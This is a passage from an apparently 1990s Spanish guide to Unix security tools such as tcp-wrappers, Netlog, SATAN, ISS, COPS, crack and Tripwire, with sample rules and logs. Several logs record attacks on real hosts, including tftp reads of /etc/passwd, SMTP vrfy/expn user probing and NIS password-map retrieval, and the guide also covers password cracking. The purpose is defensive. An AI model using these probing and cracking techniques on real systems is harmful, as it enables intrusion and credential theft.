de conexiones no deseadas a determinados servicios de red, permitiendo a su vez
ejecutar determinados comandos ante determinadas acciones de forma autom�tica.

Con este paquete podemos monitorizar y filtrar peticiones entrantes a distintos
servicios TCP-IP, como: SYSTAT, FINGER, FTP, RLOGIN, RSH, REXEC, TFTP, TALK. El
software est� formado por un peque�o programa que se instala en el "/etc/inetd.conf".
Una vez instalado, se puede controlar los accesos (mediante el uso de reglas) y dejar
una traza de todos los intentos de conexi�n tanto admitidos como rechazados (por servicios
, e indicando la m�quina que hace el intento de conexi�n).

Veamos primero el tema de las trazas que genera este software. El programa utiliza
el syslogd (puerto 514 udp) para mandar esa informaci�n; por defecto utilizar� la
salida de mail, la cual estar� indicada en el fichero de configuraci�n de syslogd
(/etc/syslog.conf) con la l�nea mail.debug. Esto se puede cambiar en los fuentes
del programa y se puede redirigir a otro lugar mediante el uso de las variables
de usuario que deja libres el syslogd (LOCAL_0,...LOCAL_7, estas variables vienen
definidas en el fichero /usr/include/syslog.h). Una vez modificados los fuentes,
se deber� indicar al syslogd donde debe dejar la informaci�n de esa variable local.

En referencia al control de conexiones a distintos servicios, el software utiliza
dos ficheros de informaci�n (hosts.allow,hosts.deny) situados en el directorio
"/etc". En estos ficheros es donde se le definir�n las reglas que debe utilizar
para el filtrado de los paquetes. El filtrado se puede realizar teniendo en cuenta
tanto a m�quinas como a servicios o una mezcla de ambos. En el caso de las m�quinas
hay varias formas de hacerlo, por ejemplo se le puede indicar que s�lo se conecten
las m�quinas pertenecientes al mismo dominio (esto se puede ampliar a los que tengan
el mismo rango de direcciones IP, para evitar que m�quinas no definidas en el DNS
no puedan conectarse), o s�lo aquellas cuyos nombres sean especificados de forma
expl�cita.
Veamos un ejemplo que consiste en permitir las conexiones s�lo de aquellas m�quinas
de mi dominio. Para ellos tendr�amos que tener lo siguiente:

hosts.deny

ALL: ALL

hosts.allow

ALL: LOCAL, .uc3m.es

La secuencia es la siguiente: en el primer fichero denegamos todas las conexiones;
mientras que en el segundo, permitimos las conexiones de las m�quinas definidas en
mi mismo dominio.

Una utilidad que puede ser interesante a la hora de tener informaci�n de conexiones
de forma autom�tica es el uso de comandos en estos ficheros. Es decir, podemos decirle
al programa que cuando se produzcan ciertas conexiones ejecute un comando.
Veamos un ejemplo:

hosts.deny

ALL: ALL (/usr/ucb/finger -l @%h | /usr/ucb/mail -s %d%h e-mail) &

hosts.allow

ALL: LOCAL, uc3m.es

En este ejemplo, cuando se produzca una conexi�n no deseada, de forma autom�tica
se ejecutar� un finger a la m�quina que origine esa conexi�n y el resultado
(del finger) se mandar� v�a correo electr�nico al usuario especificado (el
administrador de la m�quina o el responsable de seguridad de la organizaci�n),
indicando en el "subject" del mensaje el servicio intento de conexi�n y la m�quina
que lo origin�, y como cuerpo el resultado del finger sobre esa m�quina.

Adem�s de estas reglas podemos incluir protocolos espec�ficos de control, veamos un
peque�o ejemplo de esta utilidad.

hosts.deny

ALL: ALL

hosts.allow

in.ftpd: LOCAL, .uc3m.es

En este ejemplo s�lo permitimos conexiones ftp desde nuestro dominio, prohibiendo
las dem�s conexiones que est�n filtradas por el programa. Estos ejemplos son muy
b�sicos, pero el grado de complejidad de las reglas puede aumentar incluyendo distintos
protocolos y listas de m�quinas por protocolos.

Como dec�amos anteriormente este tipo de programa genera trazas de las conexiones
establecidas. Veremos a continuaci�n unas recomendaciones referentes a las trazas
que pueden extenderse a otro tipo de utilidades.

Es aconsejable disponer de una o varias m�quinas para centralizar las trazas que
creamos convenientes. Describiremos ahora una posible organizaci�n para tener
informaci�n de todas las conexiones que se producen en nuestro grupo de m�quinas.
Podemos clasificar nuestras m�quinas por sistema operativo o por funciones que realizan.
A cada uno de estos grupos se le asigna una variable en el syslog (como ve�amos
anteriormente), y se env�a (v�a syslog) a una o varias m�quinas (cuya finalidad
es que tengan todas las conexiones que se produzcan en tiempo real). El disponer de
varias m�quinas de este tipo es muy �til ya que los hackers suelen correr programas
del tipo "zap", que borran las huellas en el sistema asaltado, y este tipo de herramienta
(tcp-wrapper) que deja las trazas en un fichero tipo texto, ser�a muy f�cil su modificaci�n
editando el fichero con el "vi" para eliminar las huellas.

De hecho esto puede ser una pista de que un sistema ha sido asaltado (es decir, el que
los ficheros de trazas relativos a una m�quina sean distintos en la m�quina que lo
originan y en las m�quinas que lo centralizan). Debemos tener en cuenta que las m�quinas
que centralizan esta informaci�n deben estar muy protegidas ante los posibles ataques.

Para terminar podemos decir que el tcp-wrappers es una simple pero efectiva herramienta
para controlar y monitorizar la actividad de la red en nuestra m�quina, y nos permite
un control sobre las conexiones que se efect�an a nuestra red.

Veamos un peque�o ejemplo del fichero de trazas que genera este software.

May 29 13:21:22 lince.uc3m.es in.ftpd[237]: connect from acme.uc3m.es

May 29 13:52:00 lince.uc3m.es in.ftpd[557]: connect from acme.uc3m.es

May 29 13:54:21 lince.uc3m.es in.telnetd[561]: connect from acme.uc3m.es

May 29 14:50:20 lince.uc3m.es in.ftpd[8228]: refused connect from acme.uc3m.es

May 29 14:51:12 lince.uc3m.es in.ftpd[8232]: connect from acme.uc3m.es

May 29 14:57:33 lince.uc3m.es in.ftpd[8275]: connect from acme.uc3m.es

May 29 15:09:25 lince.uc3m.es in.telnetd[8631]: connect from acme.uc3m.es

May 29 15:35:34 lince.uc3m.es in.ftpd[8729]: connect from acme.uc3m.es

May 29 15:43:17 lince.uc3m.es in.ftpd[8754]: connect from acme.uc3m.es

Jul 25 13:47:45 lince.uc3m.es in.telnetd[338]: refused connect from acme.uc3m.es

Jul 25 13:48:16 lince.uc3m.es in.telnetd[351]: refused connect from acme.uc3m.es

Aug 7 10:20:27 lince.uc3m.es in.telnetd[3457]: connect from acme.uc3m.es

Sep 22 12:09:29 lince.uc3m.es in.telnetd[19795]: connect from acme.uc3m.es

Oct 2 09:43:03 lince.uc3m.es in.telnet[10836]: refused connect from arwen.uc3m.es

Oct 5 07:32:15 lince.uc3m.es in.telnet[2554]: refused connect from elrond.uc3m.es

Oct 10 17:51:18 lince.uc3m.es in.telnet[6959]: refused connect from arwen.uc3m.es

1.2.- Netlog

Este software de dominio p�blico dise�ado por la Universidad de Texas, es una herramienta
que genera trazas referentes a servicios basados en IP (TCP, UDP) e ICMP, as� como tr�fico
en la red (los programas pueden ejecutarse en modo promiscuo) que pudiera ser "sospechoso"
y que indicara un posible ataque a una m�quina (por la naturaleza de ese tr�fico).

El paquete est� formado por el siguiente conjunto de programas:

1.2.1.- tcplogger

Este programa escucha todos los servicios sobre TCP, dejando una traza de cada servicio
en un fichero de trazas, indicando la hora, la m�quina origen u y el puerto de esa conexi�n
...Veamos un peque�o ejemplo de un fichero originado por este programa:

04/25/95 14:23:50 6C016A00 arapaima.uc3m.es 1153 - acme telnet

04/25/95 14:29:50 4D444600 elrond 3865 - acme smtp

04/25/95 14:35:30 39665600 svin09.win.tue.nl ftp-data - acme 2527

04/25/95 14:53:26 18DB4800 ordago 3268 - acme smtp

04/25/95 14:54:49 58ECA600 elrond 3880 - acme smtp

04/25/95 14:59:58 399B7801 siuX 1529 - acme telnet

04/25/95 15:27:27 4562B200 sun.rediris.es 1617 - acme domain

04/25/95 16:15:20 DE069664 pc_jj 1048 - acme telnet

04/25/95 16:31:54 35C98800 nazgul 3215 - acme domain

04/25/95 16:32:29 D87DE00 sauron 2038 - acme domain

04/25/95 16:33:23 F760200 a16-unix 1200 - acme domain

04/25/95 16:49:35 707E1A04 info.tamu.edu ftp-data - acme 2536

07/05/95 14:24:18 34874400 elrond 4636 - acme smtp

07/05/95 15:02:44 FBB5800 arapaima.uc3m.es ftp-data - acme 1545

07/05/95 16:19:48 53C64A00 grande 2271 - acme domain

07/05/95 17:36:40 4D09AE00 elrond 1112 - acme smtp

07/05/95 17:55:53 2D816A00 chico.rediris.es 4499 - acme domain

07/05/95 18:23:50 3DF64E01 selene.uc3m.es 1443 - acme domain

07/05/95 18:57:21 A613A00 elrond 1149 - acme smtp

09/13/95 14:44:51 4C5FC201 saruman 1023 - acme printer

09/13/95 14:45:02 4C60BC01 saruman 1023 - acme printer

09/13/95 17:03:02 7603EA00 sauron 1230 - acme domain

09/13/95 17:04:37 95720601 fivos 1825 - acme domain

09/13/95 17:08:28 18315C00 nazgul 2835 - acme domain

09/13/95 17:22:12 786C2000 sauron 1252 - acme domain

1.2.2.- udplogger

Es semejante al anterior pero para los servicios sobre UDP.
Un ejemplo del fichero de trazas:

10/23/95 11:25:04 0 d.root-servers.net domain - acme domain

10/23/95 11:25:05 0 elrond 1659 - acme domain

10/23/95 11:25:05 0 elrond 1660 - acme domain

10/23/95 11:25:05 0 crl.dec.com domain - acme domain

10/23/95 11:25:06 0 acme 4083 - acme domain

10/23/95 11:25:06 0 acme 4084 - acme domain

10/23/95 11:25:06 0 darkstar.isi.edu domain - acme domain

10/23/95 11:25:06 0 acme 4087 - acme domain

10/23/95 11:25:06 0 acme 4088 - acme domain

10/23/95 11:25:07 0 sladw.arl.mil domain - acme domain

10/23/95 11:25:09 0 gw.home.vix.com domain - acme domain

10/23/95 11:25:10 0 ns-too.ripe.net domain - acme domain

10/23/95 11:25:10 0 relay.bt.net domain - acme domain

10/23/95 11:25:32 0 ns.mci.net domain - acme domain

10/23/95 11:25:32 0 nazgul 1030 - acme syslog

10/23/95 11:25:33 0 ordago 3661 - acme domain

10/23/95 11:25:33 0 0.0.0.0 68 - 255.255.255.255 67

10/23/95 11:25:51 0 zenon 4435 - acme domain

10/23/95 11:25:51 0 zenon 4436 - acme domain

10/23/95 11:25:54 0 vgr.arl.mil domain - acme domain

Los ficheros que generan estas dos herramientas pueden ser �tiles tambi�n para
detectar ataques de tipo SATAN o ISS, ya que en los ficheros de trazas se
aprecian intentos de conexi�n muy cortos en el tiempo a puertos (tcp o udp)
de forma consecutiva.

1.2.3.- icmplogger

Se encarga de trazar el tr�fico de icmp. Veamos un ejemplo del fichero de trazas:

10/23/95 11:24:08 0 elrond - acme portunreach

10/23/95 11:25:05 0 ES-s3.dante.bt.net - acme hostunreach

10/23/95 11:25:05 0 elrond - acme portunreach

10/23/95 11:25:39 0 elrond - acme portunreach

10/23/95 11:26:25 0 163.117.138.60 - acme portunreach

10/23/95 11:26:26 0 pc-11-58 - acme portunreach

10/23/95 11:26:45 0 arpa-gw.hpc.org - acme hostunreach

10/23/95 11:27:17 0 ES-s3.dante.bt.net - acme hostunreach

10/23/95 11:27:18 0 192.157.65.82 - acme hostunreach

10/23/95 11:27:41 0 elrond - acme portunreach

10/23/95 11:28:16 0 elrond - acme portunreach

10/23/95 11:28:16 0 arpa-gw.hpc.org - acme hostunreach

10/23/95 11:28:22 0 elrond - acme portunreach

10/23/95 11:28:26 0 192.157.65.82 - acme hostunreach

10/23/95 11:28:51 0 192.157.65.82 - acme hostunreach

10/23/95 11:29:05 0 192.157.65.82 - acme hostunreach

10/23/95 11:29:46 0 arpa-gw.hpc.org - acme hostunreach

Estos programas pueden guardar su informaci�n en ASCII o en formato binario, en este
segundo caso el programa dispone de una herramienta (extract) que permite consultar
los ficheros de trazas d�ndole patrones de b�squeda, como pueden ser tr�fico desde
una red concreta, intentos de conexi�n a puertos espec�ficos, etc.

1.2.4.- etherscan

Es una herramienta que monitoriza la red buscando ciertos protocolos con actividad
inusual, como puedan ser conexiones tftp(en este caso si se han realizado con �xito
nos indica qu� ficheros se han llevado), comandos en el puerto de sendmail (25
tcp) como vrfy, expn, algunos comandos de rpc como rpcinfo, peticiones al servidor
de NIS (algunas herramientas utilizan este tipo de servidores para obtener el fichero
de password, ej: ypx), peticiones al demonio de mountd, etc. Etherscan se
ejecuta en modo promiscuo en la m�quina utilizando (al igual que las anteriores) el
NIT (Network Interface Tap de SunOs 4.1.x), y tambi�n el "Packet Filtering Interface"
para realizar esas capturas. Veamos al igual que en los casos anteriores un ejemplo de
fichero de trazas:

04/25/95 14:32:29 [rpc] pc_12B14B.uc3m.es.1500 acme RPC lookup for: pcnfsd
04/25/95 14:32:29 [rpc] pc_12B14B.uc3m.es.1501 acme RPC lookup for: pcnfsd
04/25/95 16:05:57 [rpc] tony.1500 acme RPC lookup for: ypserv
04/25/95 16:06:01 [rpc] tony.1502 acme RPC lookup for: ypserv
05/05/95 12:26:52 [tftp] router4.61892 acme Attempt to write `/tftpboot/L1'.
05/05/95 12:26:56 [tftp] router4.61892 acme Attempt to write `/tftpboot/L1'.
05/08/95 09:50:56 [smtp] arapaima.uc3m.es.1033 acme vrfy jose@acme
05/09/95 17:53:34 [rpc] paco.1501 acme RPC lookup for: pcnfsd
05/10/95 10:38:16 [smtp] saruman.1339 selene.uc3m.es unknown cmd: hello selene
05/11/95 16:26:00 [rpc] balleste.1500 acme RPC lookup for: pcnfsd
05/11/95 17:30:26 [smtp] bruno.cs.colorado.edu.4671 elrond EXPN rivera
05/11/95 19:58:22 [smtp] mudhoney.micro.umn.edu.1808 elrond EXPN cloquell
05/17/95 14:47:44 [smtp] elrond.2725 tidos.tid.es vrfy jason
05/17/95 15:27:31 [tftp] master.etsit.upm.es.1918 elrond Attempt to read`/etc/passwd'.
05/19/95 09:22:17 [rpc] paco.1501 acme RPC lookup for: ypserv
05/19/95 09:32:31 [smtp] tornasol.2748 acme vrfy jose
05/19/95 09:32:53 [smtp] tornasol.2748 acme vrfy jose@di
05/19/95 09:33:10 [smtp] tornasol.2748 acme vrfy jose@kk
05/26/95 09:29:13 [rpc] pc_12B15.uc3m.es.1500 acme RPC lookup for: pcnfsd
05/26/95 09:29:13 [rpc] pc_12B15.uc3m.es.1501 acme RPC lookup for: pcnfsd
09/26/95 09:32:23 [smtp] arapaima.uc3m.es.1063 elrond vrfy
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

09/26/95 10:02:00 [rpc] paco.1500 acme RPC lookup for: ypserv
09/26/95 10:02:00 [rpc] paco.1500 acme RPC lookup for: ypserv

1.2.5.- nstat

Esta herramienta, que originariamente fue dise�ada para obtener estad�sticas
de uso de varios protocolos, se puede utilizar para detectar cambios en los
patrones de uso de la red, que nos puedan hacer sospechar que algo raro est�
pasando en la misma . Esta herramienta viene acompa�ada por dos utilidades que
nos permiten analizar la salida que origina nstat, a saber: nsum, nload.
La primera de ellas nos da informaci�n de ciertos periodos de tiempo, el segundo
es un programa awk que produce una salida que puede ser vista de forma gr�fica
por herramientas como xvgr.

Para concluir este apartado podemos decir que esta herramienta es muy �til para
detectar ciertos tipos de ataques, como hemos reflejado anteriormente (con etherscan),
as� como dar una idea de qu� tipo de protocolos est�n viajando por la red.
Adem�s tiene la ventaja que al estar en modo promiscuo, con solo tenerlo en una
m�quina del segmento se puede tener monitorizado todo el segmento en el que est� conectada.

1.3.- argus

Es una herramienta de dominio p�blico que permite auditar el tr�fico IP que se
produce en nuestra red, mostr�ndonos todas las conexiones del tipo indicado que
descubre. Este programa se ejecuta como un demonio y escucha directamente del
interfaz de red de la m�quina, y su salida es mandada bien a un fichero de trazas
o a otra m�quina para all� ser le�da. En la captura de paquetes IP se le puede
especificar condiciones de filtrado como protocolos espec�ficos, nombres de m�quinas,
etc. A la hora de leer esa informaci�n disponemos de una herramienta que incluye el
software (llamado ra) y que nos permite tambi�n realizar filtros de visualizaci�n.
Una caracter�stica de esta herramienta es la posibilidad de filtrar paquetes de acuerdo
a las listas de acceso de los routers CISCO. Es posible por tanto decirle que nos
capture aquellos paquetes que no cumplen las reglas de la lista de acceso definida
para ese interfaz del router. Como en el caso anterior (netlog) es posible ejecutar
el comando en modo promiscuo (si lo que queremos es auditar todo nuestro segmento).
Este programa divide las transacciones en cuatro grupos:

TCP, UDP/DNS, MBONE, ICMP.

Algunos ejemplos de captura pueden ser:

argus -w NombreFicheroTraza &

En este ejemplo le indicamos que nos capture todas la transacciones que se producen
en nuestra subred y que lo almacene en un fichero.

argus -w FicheroSalida ip and not icmp &

Todo el tr�fico ip pero no el icmp.

Como dec�amos antes, el ra es el programa para leer la informaci�n generada por
argus, veamos algunos ejemplos de utilizaci�n.

ra -r FicheroSalida tcp and host galileo

Vemos todo el tr�fico tcp (tanto de entrada como salida) en la m�quina galileo.

ra -C lista_acceso dst net 163.117.1.0

Vemos en tiempo real todas las transacciones a la red 163.117.1.0 que violan la
lista de acceso de ese interfaz del router.

Veamos a continuaci�n un peque�o ejemplo del fichero de trazas generado por esta utilidad:

Mon 10/23 11:25:36 ip router4 <- 255.255.255.255 CON
Mon 10/23 11:31:58 ip router4 <- 255.255.255.255 CON
Mon 10/23 11:24:02 udp acme.4075 - acme.domai TIM
Mon 10/23 11:24:02 udp acme.4076 - acme.domai TIM
Mon 10/23 11:24:02 udp acme.4079 - acme.domai TIM
Mon 10/23 11:24:44 udp leland.Stanford.domai - acme.domai TIM
Mon 10/23 11:24:48 udp acme.4081 - acme.domai TIM
Mon 10/23 11:24:49 udp acme.4082 - acme.domai TIM
Mon 10/23 11:25:36 udp julieta.2137 - acme.domai TIM
Mon 10/23 11:25:36 udp julieta.2138 - acme.domai TIM
Mon 10/23 11:25:37 udp karenina.2135 - acme.domai TIM
Mon 10/23 11:25:37 udp karenina.2136 - acme.domai TIM
Mon 10/23 11:25:37 udp karenina.2137 - acme.domai TIM
Mon 10/23 11:25:41 udp sparky.arl.mil.domai - acme.domai TIM
Mon 10/23 11:25:45 udp serv2.cl.msu.ed.domai - acme.domai TIM
Mon 10/23 11:25:12 udp wor-srv.wam.umd.domai - acme.domai TIM
Mon 10/23 11:26:04 udp a09-unix.1359 - acme.domai TIM
Mon 10/23 11:25:00 udp admii.arl.mil.domai - acme.domai TIM
Mon 10/23 11:25:35 udp sahara.upf.es.domai - acme.domai CON
Mon 10/23 11:26:17 udp sun.rediris.es.domai - acme.domai TIM

Para terminar podemos decir que este software est� disponible para SunOs 4.1.x,
Solaris 2.3 y SGI IRIX5.2

1.4.- tcpdump

Es un software de dominio p�blico que imprime las cabeceras de los paquetes que
pasan por un interfaz de red. Este programa es posible ejecutarlo en modo promiscuo
con lo que tendremos las cabeceras de los paquetes que viajan por la red. Tanto en
la captura como en la visualizaci�n de la informaci�n es posible aplicar filtros por
protocolo (TCP, UDP, IP, ARP, RARP...), puertos (en este caso el puerto puede ser un
n�mero o un nombre especificado en el fichero/etc/services), direcciones fuente,
direcciones destino, direcciones de red, as� como realizar filtros con operadores (=,
<, , !=, and, not, ...). En la �ltima versi�n es posible ver tambi�n los paquetes de
datos.

1.5.- SATAN (Security Administrator Tool for Analyzing Networks)

Es un software de dominio p�blico creado por Dan Farmer que chequea m�quinas conectadas
en red y genera informaci�n sobre el tipo de m�quina, qu� servicios da cada m�quina y
avisa de algunos fallos de seguridad que tengan dichas m�quinas. Una de las ventajas de
SATAN frente a otros paquetes es que utiliza un interfaz de WWW (como Mosaic, Netscape,..)
y va creando una base de datos de todas las m�quinas chequeadas y las va relacionando
entre ellas (de forma que si encuentra una m�quina insegura, y chequea otra m�quina que
est� relacionada con �sta, autom�ticamente quedar� marcada esta segunda tambi�n como
insegura), adem�s tiene la posibilidad de poder chequear las m�quinas con tres niveles
("light", normal y "heavy"). Una vez realizado el chequeo de la m�quina se genera una
salida en formato html, y en el caso de encontrar fallos da una peque�a explicaci�n
sobre el fallo en concreto y si existe alg�n documento sobre ese fallo recogido en el
CERT (advisory) tiene un enlace a ese documento, para que sobre la marcha pueda ser
consultado. Adem�s en el caso que el fallo de seguridad sea debido a versiones antiguas
de software da la posibilidad (mediante un enlace) de instalar una versi�n de ese software.

Algunos de los servicios chequeados por SATAN son: finger, NFS, NIS, ftp, DNS, rexd
as� como tipo de sistema operativo, versi�n de sendmail, etc. La base de datos generada
por SATAN puede ser luego consultada por varios campos: tipo de sistema operativo,
tipo de servicio (servidores de NIS, ftp, NFS, X, etc).

SATAN ha sido dise�ado como una herramienta de seguridad para ayudar a administradores
de sistemas y redes, pero tambi�n puede ser utilizada para atacar a sistemas y descubrir
la topolog�a de la red de una organizaci�n (SATAN es capaz de chequear m�quinas por subredes,
con lo que quedan al descubierto todas las m�quinas que se encuentran conectadas en dicha
subred)

Para poder compilar y ejecutar SATAN basta con poseer la versi�n 5 de perl y un visualizador
de WWW.

Para terminar, vamos a ver algunos de los fallos de seguridad que SATAN es capaz de detectar:

Acceso v�a rexec
Vulnerabilidad en el sendmail
Acceso v�a tftp
Accesos v�a rsh
Acceso a servidores X no restringido
Exportar sistemas de ficheros no restringido
Acceso a ficheros de password v�a NIS

1.6.- ISS(Internet Security Scanner)

Es una herramienta de dominio p�blico que chequea una serie de servicios para comprobar
el nivel de seguridad que tiene esa m�quina. ISS es capaz de chequear una direcci�n IP
o un rango de direcciones IP (en este caso se indican dos direcciones IP e ISS chequear�
todas las m�quinas dentro de ese rango). El programa viene acompa�ado de dos utilidades
que son ypx y strobe, la primera nos permite la transferencia de mapas NIS a trav�s de
la red y la segunda nos chequea y describe todos los puertos TCP que tiene la m�quina
que chequeamos. Como podemos ver, con la primera herramienta es posible la transferencia
de los ficheros de "password" en aquellas m�quinas que hayan sido configuradas como
servidores de NIS.

ISS se puede ejecutar con varias opciones y la salida se deja en un fichero. Adem�s,
si ha podido traerse el fichero de "password" de la m�quina chequeada crear� un fichero
aparte con la direcci�n IP de la m�quina .

1.7.- Courtney

Este software de dominio p�blico sirve para identificar la m�quina origen que intenta
realizar ataques mediante herramientas de tipo SATAN. El programa es un script perl
que trabaja conjuntamente con tcpdump. Courtney recibe entradas desde tcpdump y controla
la presencia de peticiones a nuevos servicios del stack TCP/IP (las herramientas de este
tipo realizan ataques, chequeando de forma ordenada todos los puertos TCP y UDP que tiene
el sistema, para poder ver qu� servicios tiene instalados dicha m�quina), si se detecta
que se est� produciendo un continuo chequeo de estos puertos en un breve intervalo de
tiempo, Courtney da un aviso. Este aviso se manda v�a syslog.

Courtney puede generar dos tipos de alarmas dependiendo del ataque que se est� produciendo
(normal o "heavy", las herramientas como SATAN dispone de distintos grados de chequeo de
la m�quina).

Esta herramienta necesita el int�rprete de PERL y el tcpdump.

1.8.- Gabriel

Software desarrollado por "Los Altos Technologies Inc" que permite detectar "ataques"
como los generados por SATAN . Gabriel identifica el posible ataque y de forma inmediata
lo notifica al administrador o responsable de seguridad. La notificaci�n se puede realizar
de varias formas (e-mail, cu, fichero de trazas). Este programa existe (en este momento)
para SunOs 4.1.x y Solaris, y est� formado por un cliente y un servidor. El cliente se
instala en cualquier m�quina de la red, recoge la informaci�n que se est� produciendo y
la env�a al servidor v�a syslog. Estos clientes adem�s env�an de forma regular informaci�n
al servidor para indicarle que est�n en funcionamiento.

Gabriel en el caso de SunOs 4.1.x (Solaris 1) utiliza el programa etherfind para realizar
su trabajo. Una caracter�stica interesante de este software es que no necesita programas
adicionales (como en el caso anterior PERL y tcpdump). El software viene con los ejecutables
para SunOs 4.1.x y Solaris (cliente y servidor) as� como un programa para realizar un test
de funcionamiento.

Veamos un ejemplo de una alerta generada por el programa ante un ataque con SATAN.
Adem�s de este fichero, se genera un mensaje de correo alertando del ataque.

Mon 07/24/95 14:15:01 restrained attacks from acme
Tue 07/25/95 10:15:01 restrained attacks from acme
Tue 07/25/95 14:00:01 restrained attacks from acme

1.9.- tcplist

Es un peque�o programa de dominio p�blico que nos informa de todas las conexiones
TCP desde o hacia la m�quina donde lo estamos ejecutando.

1.10.- nocol (Network Operations Center On-Line)

Es un conjunto de programas de monitorizaci�n de sistemas y redes. El software es
un conjunto de agentes que recogen informaci�n y escriben la salida en un formato
que se puede luego procesar. Cada dato procesado recibe el nombre de evento y cada
evento tiene asociado una gravedad. Existen cuatro niveles de gravedad (CRITICAL,
ERROR, WARNING, INFO), cada uno de estos niveles es controlado de forma independiente
por cada agente. Existe un conjunto de herramientas que nos permiten ver toda la
informaci�n generada por los agentes y que puede ser filtrada dependiendo de la
gravedad del evento. Entre las cosas que pueden ser controladas por este software
tenemos:

Monitor de ICMP (usando ping o multiping)
Carga en la red (ancho de banda)
Monitor de puertos TCP.
Monitor de SNMP y SNMP traps.
Monitor de servidor de Nombres.
Monitor de rpc.
Chequeo del bootpd

2.- Herramientas que chequean la integridad del sistema

Veremos a continuaci�n una serie de herramientas que nos ayudar�n a proteger nuestro
sistema. Para conseguirlo tenemos dos tipos de herramientas. Las primeras se basan en
chequeos a los ficheros y las segundas nos alertan de posibles modificaciones de ficheros,
y, de programas "sospechosos" que puedan estar ejecut�ndose en la m�quina de forma
camuflada. Veremos primero las que chequean la integridad de los sistemas de ficheros.

2.1.- COPS (Computer Oracle and Password System)

Cops es un conjunto de programas dise�ados por la Universidad de Purdue que chequean
ciertos aspectos del sistema operativo UNIX relacionados con la seguridad. Existen dos
versiones de este paquete: una versi�n escrita en "sh" y "C" y otra versi�n escrita en
"perl", aunque su funcionalidad es similar. Este programa es f�cil de instalar y configurar
y se ejecuta en gran cantidad de plataformas UNIX. En el primer caso necesitaremos un
compilador de lenguaje C y una shell est�ndar (sh), en el segundo nos bastar� con tener
instalado el interprete de perl (versi�n 3.18 o superior). Entre las funcionalidades que
tiene Cops podemos destacar.

Chequeo de modos y permisos de los ficheros, directorios y dispositivos
Palabras de paso pobres (en el caso que tengamos una herramienta como crack,
podemos comentar la l�nea de chequeo de palabras de paso)
Chequeo de contenido, formato y seguridad de los ficheros de "password" y "group"
Chequeo de programas con root-SUID.
Permisos de escritura sobre algunos ficheros de usuario como ".profile" y ".cshrc"
Configuraci�n de ftp "anonymous".
Chequeo de algunos ficheros del sistema como "hosts.equiv", montajes de NFS sin
restricciones, "ftpusers", etc.

Veamos un ejemplo del fichero creado por este programa:

ATTENTION:

Security Report for Tue Apr 11 13:33:33 WET DST 1995
from host acme
Warning! Root does not own the following file(s):
/dev /usr/etc
Warning! NFS file system exported with no restrictions!
Warning! NFS file system exported with no restrictions!
Warning! NFS file system exported with no restrictions!
Warning! /dev/fd0 is _World_ writable!
Warning! /dev/fd0 is _World_ readable!
Warning! /etc/ethers is _World_ writable!
Warning! /etc/motd is _World_ writable!
Warning! /etc/utmp is _World_ writable!
Warning! /usr/adm/snm is _World_ writable!
Warning! File /etc/motd (in /etc/rc.local.orig) is _World_ writable!

Warning! User uucp's home directory /var/spool/uucppublic is mode 03777!
Warning! Password file, line 12, user sysdiag has uid = 0 and is not root
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
Warning! Password file, line 13, user sundiag has uid = 0 and is not root
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
Warning! YPassword file, line 2, user sundiag has uid = 0 and is not root
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
Warning! YPassword file, line 3, user sysdiag has uid = 0 and is not root
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
Warning! /etc/ftpusers should exist!
Warning! Anon-ftp directory pub is World Writable!

2.2.- tiger

Es un software desarrollado por la Universidad de Texas que est� formado por un
conjunto de shell scripts y c�digo C que chequean el sistema para detectar problemas
de seguridad de forma parecida a COPS. Una vez chequeado el sistema, se genera un
fichero con toda la informaci�n recogida por el programa. Tiger dispone de una
herramienta (tigexp) que recibe como par�metro dicho fichero y da una serie de
explicaciones adicionales de cada l�nea que gener� el programa anterior. El
programa viene con un fichero de configuraci�n donde es posible decirle qu� tipo
de chequeo se quiere realizar (podemos comentar las operaciones m�s lentas y ejecutar
�stas de forma menos continuada, mientras que las m�s r�pidas pueden ser ejecutadas
m�s frecuentemente). Entre la informaci�n que chequea el programa tenemos.

Configuraci�n del sistema.
Sistemas de ficheros.
Ficheros de configuraci�n de usuario.
Chequeo de caminos de b�squeda.
Chequeos de cuentas.
Chequeos de alias.
Comprueba la configuraci�n de ftp "anonymous".
Chequeo scripts de cron.
NFS.
Chequeo de servicios en el fichero /etc/inetd.conf
Chequeo de algunos ficheros de usuario (.netrc, .rhosts, .profile, etc)
Comprobaci�n ficheros binarios (firmas). Para poder chequear �stos es
necesario disponer de un fichero de firmas.

2.3.- crack

Este paquete de dominio p�blico realizado por Alex Muffet permite chequear el fichero
de contrase�as de UNIX y encontrar palabras de paso triviales o poco seguras. Para ello
utiliza el algoritmo de cifrado (DES) utilizado por el sistema UNIX y va comprobando a
partir de reglas y de diccionarios, las palabras de paso que se encuentran en el fichero
de contrase�as, creando un fichero con todos los usuarios y palabras descubiertas. Se
realizan una serie de pasadas sobre el fichero de contrase�as aplicando la secuencia
de reglas que se especifique. Estas reglas se encuentran en dos ficheros (gecos.rules y
dicts.rules) y pueden ser modificadas utilizando un lenguaje bastante simple. Para una
mayor efectividad pueden utilizarse diccionarios complementarios (existen en gran
diversidad en servidores ftp) en diferentes idiomas y sobre diversos temas. Experiencias
realizadas en la Universidad Carlos III de Madrid sobre diversas m�quinas han arrojado
unos resultados de 16% de palabras de paso triviales en m�quinas donde no se ten�a ninguna
norma a la hora de poner contrase�as de usuario.

Es una buena norma pasar de forma peri�dica el crack para detectar contrase�as poco seguras,
adem�s de tener una serie de normas sobre palabras de paso (tanto en su contenido como en la
periodicidad con que deben ser cambiadas).

2.4.- Tripwire

Este software de dominio p�blico desarrollado por el Departamento de Inform�tica de la
Universidad de Purdue, es una herramienta que comprueba la integridad de los sistemas
de ficheros, y ayuda al administrador a monitorizar �stos frente a modificaciones no
autorizadas. Esta herramienta avisa al administrador de cualquier cambio o alteraci�n
de ficheros en la m�quina (incluido binarios). El programa crea una base de datos con
un identificador por cada fichero analizado, y puede ser comparado en cualquier momento
el actual con el registrado en la base de datos, avisando ante cualquier alteraci�n,
eliminaci�n o inclusi�n de un nuevo fichero en el sistema de ficheros. La base datos
est� compuesta por una serie de datos como la fecha de la �ltima modificaci�n, propietario,
permisos, etc. con todo ello se crea una firma para cada fichero en la base de datos.

